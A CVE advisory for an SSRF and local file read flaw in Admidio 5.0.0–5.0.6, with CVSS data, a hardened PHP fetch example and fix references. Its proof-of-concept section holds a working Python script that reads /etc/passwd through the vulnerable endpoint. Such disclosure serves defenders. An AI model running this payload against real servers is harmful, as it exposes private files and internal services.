Security Vulnerability Report
CVE-2026-32812 (CVSS 6.8, MEDIUM)

Published: 2026-03-20 02:16:35
Last Modified: 2026-03-23 15:24:40

Description

Admidio is an open-source user management solution. In versions 5.0.0 through 5.0.6, unrestricted URL fetch in the SSO Metadata API can result in SSRF and local file reads. The SSO Metadata fetch endpoint at modules/sso/fetch_metadata.php accepts an arbitrary URL via $_GET['url'], validates it only with PHP's FILTER_VALIDATE_URL, and passes it directly to file_get_contents(). FILTER_VALIDATE_URL accepts file://, http://, ftp://, data://, and php:// scheme URIs. An authenticated administrator can use this endpoint to read arbitrary local files via the file:// wrapper (Local File Read), reach internal services via http:// (SSRF), or fetch cloud instance metadata. The full response body is returned verbatim to the caller. This issue has been fixed in version 5.0.7.
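The unsafe pattern the description names, next to one way to harden it, as an added PHP example that is not Admidio's code and not its actual 5.0.7 patch; the function names and the private/reserved-range policy are assumptions:

```php
<?php
// Added example (not Admidio's code): the unsafe fetch the advisory
// describes, next to a hardened version. Function names are assumed.

// Unsafe: FILTER_VALIDATE_URL accepts file://, php://, data:// and ftp://
// as readily as http://, so file_get_contents() reads local files or
// internal hosts and the caller gets the full body back.
function fetchMetadataUnsafe(string $url): string|false
{
    if (filter_var($url, FILTER_VALIDATE_URL) === false) {
        return false;
    }
    return file_get_contents($url);
}

// Hardened: allow only http(s); resolve the host and refuse private,
// loopback, link-local and reserved addresses (FILTER_FLAG_NO_RES_RANGE
// covers 127.0.0.0/8 and 169.254.0.0/16, i.e. cloud metadata endpoints);
// fetch with a context that follows no redirects and caps the size.
function fetchMetadataSafe(string $url, int $maxBytes = 1048576): string|false
{
    $parts = parse_url($url);
    if ($parts === false || empty($parts['scheme']) || empty($parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // gethostbyname() returns the name unchanged on failure, which then
    // fails FILTER_VALIDATE_IP, so unresolvable hosts are rejected too.
    $ip = gethostbyname($parts['host']);
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
        return false;
    }
    $ctx = stream_context_create([
        'http' => ['follow_location' => 0, 'timeout' => 5, 'ignore_errors' => true],
    ]);
    return file_get_contents($url, false, $ctx, 0, $maxBytes);
}

// A file:// or php:// value passes fetchMetadataUnsafe() but is rejected
// by fetchMetadataSafe() at the scheme check, before any I/O happens.
```

The resolve-then-fetch check still leaves a DNS rebinding window between gethostbyname() and the actual connection; a stricter build connects to the validated IP directly and sets the Host header itself.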

CVSS Details

CVSS Score: 6.8
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N
Weakness: CWE-918 (Server-Side Request Forgery)

Configurations (Affected Products)

cpe:2.3:a:admidio:admidio:*:*:*:*:*:*:*:* - VULNERABLE
Admidio 5.0.0 - 5.0.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

target_url = "http://target-admidio-site/modules/sso/fetch_metadata.php"

# Malicious payload using file:// protocol to read local files
payload = {"url": "file:///etc/passwd"}

# Administrator session cookie (required for exploitation)
cookies = {"PHPSESSID": "valid_admin_session_id"}

try:
    response = requests.get(target_url, params=payload, cookies=cookies)
    if response.status_code == 200:
        print("[+] Vulnerability Exploited Successfully!")
        print("[+] Response Body:")
        print(response.text)
    else:
        print("[-] Exploit failed. Status Code:", response.status_code)
except Exception as e:
    print("[-] An error occurred:", e)

References

https://github.com/Admidio/admidio/commit/f6b7a966abe4d75e9f707d665d7b4b5570e3185a (Patch)
https://github.com/Admidio/admidio/releases/tag/v5.0.7 (Release Notes)
https://github.com/Admidio/admidio/security/advisories/GHSA-6j68-gcc3-mq73 (Vendor Advisory, Mitigation)